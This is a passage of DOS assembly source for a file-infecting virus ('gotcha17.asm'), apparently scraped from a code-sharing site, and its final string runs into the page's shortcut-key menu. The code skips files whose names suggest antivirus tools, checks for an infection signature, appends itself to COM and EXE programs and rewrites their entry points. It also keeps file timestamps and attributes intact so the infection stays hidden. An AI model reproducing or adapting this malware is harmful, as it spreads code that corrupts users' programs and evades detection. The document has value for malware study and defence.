📄 gotcha17.asm
字号:
envloop: mov si,offset envstring-3 ;check the environment
mov cx,ENVLEN
repz cmpsb
jz close ;exit if item found
dec di ;goto next item
xor al,al
mov ch,0FF
repnz scasb
cmp byte ptr es:[di],0 ;finnished environment?
jnz envloop
mov ax,3300 ;get ctrl-break flag
int 21
push dx
cwd ;clear the flag
inc ax
push ax
int 21
mov dx,bx
mov ax,3524 ;get int24 vector
int 21
push bx
push es
mov bx,dx
push cs
pop ds
mov dx,offset ni24 ;set int24 vector
mov ah,25
push ax
int 21
mov ax,1220 ;get file-table entry
push bx
push ax
int 2F
mov bl,es:[di]
pop ax
sub al,0A
int 2F
pop bx
push es
pop ds
push [di+2] ;save attribute & open-mode
push [di+4]
cmp word ptr [di+28],'XE' ;check extension
jne not_exe
cmp byte ptr [di+2A],'E'
jmp short check
not_exe: cmp word ptr [di+28],'OC'
jne close1v
cmp byte ptr [di+2A],'M'
check: je check_name
close1v: jmp close1
check_name: cmp byte ptr [di+20],'V' ;name is V*.* ?
je close1v
cmp byte ptr [di+20],'F' ;name is F*.* ?
je close1v
mov cx,7 ;name is *SC*.* ?
mov ax,'CS'
push di
add di,21
SCloop: dec di
scasw
loopnz SCloop
pop di
je close1v
mov byte ptr [di+2],2 ;open for read/write
mov byte ptr [di+4],0 ;clear attributes
call getlen
mov cl,3
sub ax,cx ;goto signature
sbb dx,0
call goto
push ax ;save old offset
push dx
push cs
pop ds
mov si,0100 ;read signature
mov dx,si
mov ah,3F
int 21
cmp word ptr [si],'!A' ;already infected?
je close2v
call gotobegin
mov cl,BUFLEN ;read begin
mov dx,si
mov ah,3F
int 21
cmp word ptr [si],5A4Dh ;EXE ?
jz do_EXE
cmp word ptr [si],4D5A
jz do_EXE
do_COM: mov byte ptr [si+BUFLEN],COMSIGN
cmp byte ptr es:[di+12],0FC ;check length
jnb close2
cmp byte ptr es:[di+12],3
jbe close2
call writeprog ;write program to end of file
jnz close2
mov byte ptr [si],0E9h ;JMP xxxx'
call getoldlen
add ax,(BUFLEN-2)
mov word ptr [si+1],ax
jmp short done
close2v: jmp short close2
do_EXE: mov byte ptr [si+BUFLEN],EXESIGN
call writeprog ;write program to end of file
jnz close2
call getlen ;calculate new length
mov cx,0200 ;put new length in header
div cx
inc ax
mov word ptr [si+4],ax
mov word ptr [si+2],dx
call getoldlen ;calculate new CS & IP
mov cx,0010
div cx
sub ax,word ptr [si+8]
mov word ptr [si+16],ax ;put CS in header
add dx,BUFLEN+1
mov word ptr [si+14],dx ;put IP in header
done: call gotobegin
mov cx,BUFLEN ;write new begin
mov dx,si
mov ah,40
int 21
close2: push es
pop ds
pop dx ;restore old offset in file
pop ax
call goto
or byte ptr [di+6],40 ;no time-change
close1: call close
or byte ptr [di+5],40 ;no EOF on next close
pop [di+4] ;restore attribute & open-mode
pop [di+2]
pop ax ;restore int24 vector
pop ds
pop dx
int 21
pop ax ;restore ctrl-break flag
pop dx
int 21
ret
;****************************************************************************
;* Get original length of program
;****************************************************************************
getoldlen: call getlen
sub ax,FILELEN
sbb dx,0
ret
;****************************************************************************
;* Get length of program
;****************************************************************************
getlen: mov ax,es:[di+11]
mov dx,es:[di+13]
ret
;****************************************************************************
;* Goto new offset DX:AX
;****************************************************************************
gotobegin: xor ax,ax
cwd
goto: xchg ax,es:[di+15]
xchg dx,es:[di+17]
ret
;****************************************************************************
;* Write virus to the file
;****************************************************************************
writeprog: call getlen
call goto
mov cx,FILELEN ;write virus
mov dx,si
mov ah,40
int 21
cmp cx,ax ;are all bytes written?
ret
;****************************************************************************
;* Text and Signature
;****************************************************************************
envstring db 'E=mc⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -